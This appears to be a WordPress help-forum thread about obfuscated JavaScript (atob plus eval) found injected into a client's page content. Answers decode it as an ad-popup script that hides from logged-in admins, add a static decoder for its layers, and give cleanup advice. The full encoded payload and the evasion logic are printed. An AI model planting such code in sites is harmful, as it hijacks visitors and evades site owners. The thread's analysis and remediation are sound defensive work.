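Strange gibberish JavaScript in the editor: website hacked?

Date: 2018-01-25 Author: tillinberlin

The client's website runs the "enfold" theme, which comes with the "enfold Advanced Layout Editor". That editor is currently broken, possibly because of an old version in combination with PHP, or for some other reason. Anyway, to work around the problem I looked at the actual database table, and about 20 blank lines below the page content I found this very strange-looking JavaScript code: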

<script> </script> <script> </script> <script> </script>
<script type="text/javascript">
var GVCNLUQKSK = atob(\'dmFyIEJLWE9TWkdWT1kgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEzIC0gMywgMTI3IC0gOSwgMTA1IC0gOCwgMTE4IC0gNCwgMzQgLSAyLCAxMTAgLSAzLCAxMDcgLSA2LCAxMjcgLSA2LCAzNCAtIDIsIDY3IC0gNiwgMzQgLSAyLCA0OCAtIDksIDg4IC0gNCwgNzYgLSA3LCA3OSAtIDUsIDc0IC0gNCwgMTIxIC0gOSwgNzggLSA0LCAxMDcgLSA3LCAxMjUgLSAzLCA3NSAtIDIsIDEyMiAtIDYsIDQwIC0gMSwgNjggLSA5LCAxMSAtIDEsIDEyNiAtIDgsIDk5IC0gMiwgMTE5IC0gNSwgMzkgLSA3LCAxMDcgLSA2LCAxMTMgLSAzLCAxMDIgLSAzLCAxMDkgLSA4LCAxMDQgLSA0LCAzMyAtIDEsIDY1IC0gNCwgMzcgLSA1LCA0NCAtIDUsIDc4IC0gNSwgMTA4IC0gMywgOTAgLSA5LCA1NiAtIDQsIDk1IC0gNSwgMTA3IC0gNCwgNjYgLSAxLCA1OSAtIDcsIDc0IC0gOSwgMTExIC0gNywgOTggLSA4LCAxMTkgLSA3LCA4NCAtIDEsIDg5IC0gMSwgODggLSA3LCAxMDcgLSAzLCA3OSAtIDUsIDkxIC0gOCwgODkgLSA0LCA3MSAtIDEsIDgxIC0gNywgMTI2IC0gNywgNzcgLSA4LCA5NCAtIDksIDg1IC0gNSwgOTQgLSA4LCAxMTIgLSAxLCA1NiAtIDUsIDg2IC0gOCwgMTI3IC0gNiwgNjUgLSA5LCAxMTIgLSAyLCA3NSAtIDksIDc1IC0gOCwgNjUgLSA5LCAxMDkgLSA1LCA3NyAtIDcsIDEwNyAtIDIsIDEyMiAtIDMsIDk4IC0gOCwgODUgLSA4LCA4OCAtIDUsIDExOSAtIDQsIDUwIC0gNywgMTA0IC0gNiwgMTExIC0gMywgMTA3IC0gOCwgNjIgLSA5LCA3MCAtIDQsIDEyNiAtIDcsIDExMiAtIDksIDEwNSAtIDIsIDcxIC0gNSwgNjkgLSAyLCA3MiAtIDYsIDEwOCAtIDMsIDkyIC0gMywgNTIgLSAxLCA1MyAtIDQsIDYxIC0gNywgODIgLSAzLCAxMTIgLSA4LCA5MSAtIDIsIDEwNSAtIDYsIDgxIC0gNywgODkgLSAzLCAxMTYgLSA1LCAxMTkgLSA5LCA3NCAtIDEsIDcwIC0gMiwgNTMgLSAxLCA4MCAtIDgsIDY5IC0gMywgNzAgLSAyLCA1NCAtIDIsIDkzIC0gNiwgNzYgLSA3LCAxMjcgLSA2LCAxMjIgLSA3LCA2OSAtIDMsIDgyIC0gOSwgNzYgLSA5LCA2OSAtIDMsIDExNCAtIDksIDkzIC0gNCwgODkgLSA4LCA4NSAtIDgsIDYwIC0gOCwgNzUgLSA5LCA1NCAtIDUsIDU2IC0gNywgMTE3IC0gOSwgODggLSAzLCAxMjcgLSA1LCAxMjQgLSA1LCAxMjEgLSAxLCA4NyAtIDcsIDEwOSAtIDMsIDkzIC0gMywgODMgLSA4LCA5NyAtIDcsIDk0IC0gOSwgMTE2IC0gMSwgODEgLSAyLCA4MCAtIDEsIDEyNyAtIDcsIDg5IC0gNCwgMTI5IC0gOCwgODIgLSA5LCAxMjkgLSA4LCA3OSAtIDIsIDExNCAtIDYsIDc0IC0gNSwgOTIgLSA4LCAxMTYgLSA1LCA4MCAtIDIsIDkzIC0gNywgNzYgLSA5LCAxMDAgLSAxLCA5MiAtIDMsIDEwNyAtIDYsIDEyOCAtIDYsIDk2IC0gNywgNDkgLSA2LCA3OCAtIDQsIDEyNCAtIDUsIDg3IC0gNiwgMTA5IC0gMywgNzAgLSA0LCA1NCAtIDUsIDkzIC0gOCwgMTEzIC0gNiwgNzQgLSA0LCA4NyAtIDMsIDUyIC0gNCwg
MTIxIC0gNywgOTEgLSAxLCA3MiAtIDUsIDEyMSAtIDIsIDcwIC0gMiwgMTA1IC0gNywgODYgLSAxLCA1MiAtIDMsIDY5IC0gMywgODIgLSAxLCAxMjkgLSA5LCA3NCAtIDksIDU5IC0gNCwgNzkgLSA1LCAxMTAgLSA0LCA2NSAtIDksIDEyMyAtIDksIDc1IC0gNSwgOTEgLSA4LCA5MCAtIDksIDkwIC0gOSwgODcgLSAxLCA3NCAtIDcsIDc2IC0gNywgODggLSA2LCA4MCAtIDIsIDkxIC0gOCwgNzggLSA4LCAxMDkgLSAyLCA3OCAtIDQsIDEyMCAtIDEsIDY5IC0gNCwgNTkgLSA1LCA3MiAtIDcsIDg4IC0gNiwgODYgLSA1LCAxMTggLSAyLCA4NyAtIDksIDEyOCAtIDYsIDEyMiAtIDMsIDEyMyAtIDgsIDc3IC0gMywgMTA4IC0gMywgNzggLSA0LCA5NiAtIDcsIDg2IC0gNywgMTA5IC0gNSwgOTEgLSAyLCAxMDcgLSA4LCA4MiAtIDgsIDkyIC0gNiwgNTMgLSA0LCAxMTkgLSAxLCA4NiAtIDIsIDEyOCAtIDksIDcwIC0gOSwgNjggLSA3LCA0MiAtIDMsIDYzIC0gNCwgMTEgLSAxLCAxMDMgLSAxLCAxMjUgLSA4LCAxMTcgLSA3LCAxMDUgLSA2LCAxMTkgLSAzLCAxMTQgLSA5LCAxMTggLSA3LCAxMTEgLSAxLCAzNyAtIDUsIDEyNyAtIDcsIDExOSAtIDgsIDExOSAtIDUsIDEwMyAtIDgsIDEwOSAtIDgsIDExNyAtIDcsIDEwMSAtIDIsIDQxIC0gMSwgMTIwIC0gNSwgMTE3IC0gMSwgMTE1IC0gMSwgMTEzIC0gOCwgMTEzIC0gMywgMTExIC0gOCwgNDkgLSA1LCAzMyAtIDEsIDExMyAtIDYsIDEwOCAtIDcsIDEzMCAtIDksIDQyIC0gMSwgMzQgLSAyLCAxMjggLSA1LCAxMyAtIDMsIDM1IC0gMywgNDAgLSA4LCAxMTkgLSAxLCAxMDYgLSA5LCAxMjMgLSA5LCAzNSAtIDMsIDExNyAtIDMsIDEwNyAtIDYsIDExOSAtIDQsIDM1IC0gMywgNjYgLSA1LCAzNiAtIDQsIDQ1IC0gNiwgNDMgLSA0LCA2NyAtIDgsIDE2IC0gNiwgMzYgLSA0LCAzNyAtIDUsIDEwOSAtIDcsIDExMyAtIDIsIDExNiAtIDIsIDM3IC0gNSwgNDkgLSA5LCAxMjYgLSA4LCAxMDEgLSA0LCAxMTUgLSAxLCA0MCAtIDgsIDExMyAtIDgsIDM0IC0gMiwgNzAgLSA5LCA0MCAtIDgsIDUxIC0gMywgNjEgLSAyLCAzNSAtIDMsIDExNCAtIDksIDM4IC0gNiwgNjUgLSA1LCA0MCAtIDgsIDExOSAtIDQsIDEyMiAtIDYsIDExNiAtIDIsIDEwOSAtIDQsIDExMSAtIDEsIDEwOCAtIDUsIDQ3IC0gMSwgMTA5IC0gMSwgMTEwIC0gOSwgMTE2IC0gNiwgMTA3IC0gNCwgMTI0IC0gOCwgMTEyIC0gOCwgNjQgLSA1LCAzNCAtIDIsIDExMCAtIDUsIDQ5IC0gNiwgNDYgLSAzLCA0NiAtIDUsIDQwIC0gOCwgMTMwIC0gNywgMTcgLSA3LCAzOSAtIDcsIDM5IC0gNywgNDEgLSA5LCAzNyAtIDUsIDEyMCAtIDYsIDEwMiAtIDEsIDEyMCAtIDUsIDQwIC0gOCwgNTIgLSA5LCA2MyAtIDIsIDMzIC0gMSwgOTEgLSA4LCAxMTggLSAyLCAxMTggLSA0LCAxMDkgLSA0LCAxMTEgLSAxLCAxMDUgLSAyLCA1MCAtIDQsIDExMSAtIDksIDEyMCAtIDYsIDExNyAtIDYsIDExNiAtIDcsIDY5IC0gMiwgMTA4IC0gNCwgMTAyIC0gNSwg
MTIwIC0gNiwgNzMgLSA2LCAxMTMgLSAyLCAxMDEgLSAxLCAxMDYgLSA1LCA0NiAtIDYsIDExOSAtIDQsIDEyMCAtIDQsIDExNiAtIDIsIDEwNyAtIDIsIDExNCAtIDQsIDExMCAtIDcsIDUzIC0gNywgMTAzIC0gNCwgMTA4IC0gNCwgOTggLSAxLCAxMTYgLSAyLCA3NCAtIDcsIDExOSAtIDgsIDEwOCAtIDgsIDEwMyAtIDIsIDY3IC0gMiwgMTE3IC0gMSwgNDYgLSA2LCAxMDggLSAzLCA0NyAtIDYsIDQwIC0gOCwgOTggLSA0LCAxOSAtIDksIDExIC0gMiwgMTMgLSA0LCAxOCAtIDksIDE1IC0gNiwgMTA4IC0gMSwgMTA4IC0gNywgMTI1IC0gNCwgNDggLSAyLCAxMDYgLSA3LCAxMTAgLSA2LCAxMDAgLSAzLCAxMjMgLSA5LCA2OSAtIDIsIDExNyAtIDYsIDEwMSAtIDEsIDEwNSAtIDQsIDY2IC0gMSwgMTI1IC0gOSwgNDUgLSA1LCAxMTAgLSA1LCAzMyAtIDEsIDQ1IC0gOCwgMzggLSA2LCAxMTUgLSA4LCAxMDYgLSA1LCAxMjUgLSA0LCA0OCAtIDIsIDExNyAtIDksIDEwMyAtIDIsIDExMSAtIDEsIDEwOCAtIDUsIDEyNSAtIDksIDEwOCAtIDQsIDQ0IC0gMywgNDkgLSA4LCA2NCAtIDUsIDE3IC0gNywgNDEgLSA5LCAzNCAtIDIsIDEzMiAtIDcsIDEzIC0gMywgMzcgLSA1LCAzOSAtIDcsIDExOSAtIDUsIDEwNCAtIDMsIDExOCAtIDIsIDEyMCAtIDMsIDEyMyAtIDksIDExNSAtIDUsIDM5IC0gNywgMTE3IC0gMywgMTEwIC0gOSwgMTI0IC0gOSwgNjYgLSA3LCAxOCAtIDgsIDEyOSAtIDQsIDE5IC0gOSwgMTIgLSAyLCAxMjQgLSA2LCAxMDYgLSA5LCAxMTYgLSAyLCAzMyAtIDEsIDEwNyAtIDcsIDEwNCAtIDMsIDEwNyAtIDgsIDM5IC0gNywgNjcgLSA2LCA0MCAtIDgsIDEyNyAtIDcsIDExOSAtIDgsIDEyMCAtIDYsIDk2IC0gMSwgMTA0IC0gMywgMTE3IC0gNywgMTAzIC0gNCwgNDMgLSAzLCAxMDMgLSA2LCAxMjIgLSA2LCAxMTcgLSA2LCA5OSAtIDEsIDQ3IC0gNywgMTAzIC0gMiwgMTE5IC0gOSwgMTA2IC0gNywgMTA5IC0gOCwgMTA5IC0gOSwgNDcgLSA2LCA0OCAtIDQsIDM4IC0gNiwgMTE0IC0gNywgMTA5IC0gOCwgMTI3IC0gNiwgNDUgLSA0LCA2MSAtIDIsIDE2IC0gNiwgNDEgLSAxLCAxMTEgLSAxLCAxMDcgLSA2LCAxMjIgLSAzLCA0MSAtIDksIDc1IC0gNSwgMTIzIC0gNiwgMTE3IC0gNywgMTA2IC0gNywgMTE4IC0gMiwgMTA2IC0gMSwgMTE3IC0gNiwgMTE1IC0gNSwgNDMgLSAzLCAxMDMgLSAzLCAxMDkgLSA4LCAxMDYgLSA3LCA0OSAtIDgsIDQyIC0gMSwgNDcgLSA3LCA0NiAtIDUsIDYzIC0gNCwgMTUgLSA1LCAxNCAtIDQpO2V2YWwoQktYT1NaR1ZPWSk7\'); 
eval(GVCNLUQKSK);
</script>   
<script> </script> <script> </script> <script> </script>
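…should I / my client be worried…?!

…or is this simply what the "Advanced Layout Editor" does…?

Thanks a lot.

2 Answers
Best answer, by SO user swissspidy

Decoding the JavaScript "gibberish" shows that it is a script that opens a popup window with ads after the user clicks somewhere.

Most importantly, these popups are not shown if you are currently logged in. That is why such scripts often go unnoticed.

Here is an edited excerpt: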

// Fires at most once per page load
var t = false;
document.onclick= function(event) {
  if (t) {
    return;
  }
  t = true;

  // Do nothing for logged-in WordPress users (admins, editors)
  var cookie = document.cookie || '';
  if (cookie.indexOf('wordpress_logged') !== -1
      || cookie.indexOf('wp-settings') !== -1
      || cookie.indexOf('wordpress_test') !== -1) {
    return;
  }

  if ( event === undefined) event= window.event;
  var target= 'target' in event? event.target : event.srcElement;
  // Open the ad page in a new window
  var win = window.open('http://...---redacted---', '_blank');
  win.focus();
};

So yes, you should be worried. There is a My site was hacked FAQ in the WordPress Codex that you should read in order to take the appropriate next steps.
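The two outer layers of the script in the question (the `atob` wrapper and the `String.fromCharCode` arithmetic inside it) can be unwrapped without executing any of it. The following is an added example, not part of the original answers; the function names and the sample are constructed here, and the cookie indicators are the ones from the excerpt above.

```javascript
// Static decoder for the two outer layers. Nothing is executed:
// no eval, no Function, only string parsing (runs under Node.js).

// Layer 1: pull the base64 literal out of atob('...'). Tolerates the \' escapes
// and the line breaks inside the literal that appear in the database dump.
function extractAtobPayloads(html) {
  const re = /atob\(\s*\\?['"]([A-Za-z0-9+\/=\s]+)\\?['"]\s*\)/g;
  const out = [];
  for (const m of html.matchAll(re)) {
    out.push(Buffer.from(m[1].replace(/\s+/g, ''), 'base64').toString('latin1'));
  }
  return out;
}

// Layer 2: String.fromCharCode(a - b, c - d, ...) -> text, by doing the arithmetic.
function decodeCharCodeArithmetic(js) {
  const call = /String\.fromCharCode\(([\d\s,+\-]+)\)/.exec(js);
  if (!call) return null;
  return call[1].split(',').map((term) => {
    const m = /^\s*(\d+)\s*(?:([+-])\s*(\d+))?\s*$/.exec(term);
    if (!m) throw new Error('unexpected term: ' + term);
    const a = Number(m[1]), b = m[3] ? Number(m[3]) : 0;
    return String.fromCharCode(m[2] === '+' ? a + b : a - b);
  }).join('');
}

// Indicators taken from the decoded excerpt in the answer above.
function triage(decoded) {
  return {
    hidesFromLoggedIn: /wordpress_logged|wp-settings|wordpress_test/.test(decoded),
    opensWindow: /window\.open\(/.test(decoded),
    hasFurtherEval: /\beval\(/.test(decoded),
  };
}

function analyze(html) {
  return extractAtobPayloads(html).map((layer1) => {
    const layer2 = decodeCharCodeArithmetic(layer1);
    return { layer1, layer2, flags: triage(layer2 ?? layer1) };
  });
}

// Constructed sample in the same shape as the dump; harmless payload "x=1;".
const inner = 'var A = String.fromCharCode(127 - 7, 64 - 3, 58 - 9, 62 - 3);eval(A);';
const sample = "<script>var B = atob(\\'" + Buffer.from(inner).toString('base64') +
  "\\'); eval(B);</script>";
console.log(analyze(sample));
```

If `hasFurtherEval` is still true on the last decoded layer, another encoding layer remains and should be unwrapped the same way, by reading it rather than running it.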

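SO user: janh

No, the editor doesn't do that, and yes, you should be worried.

Restore a clean backup, and keep your core and plugins up to date.

Change the WordPress and FTP/SFTP passwords. Make sure there are no infected client machines with access to the WP backend.

Installing a plugin such as WordFence may help. It won't prevent all attacks from happening or succeeding, but it will stop some of them (mostly automated attacks, which are the vast majority), and it can help you identify which files are infected.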
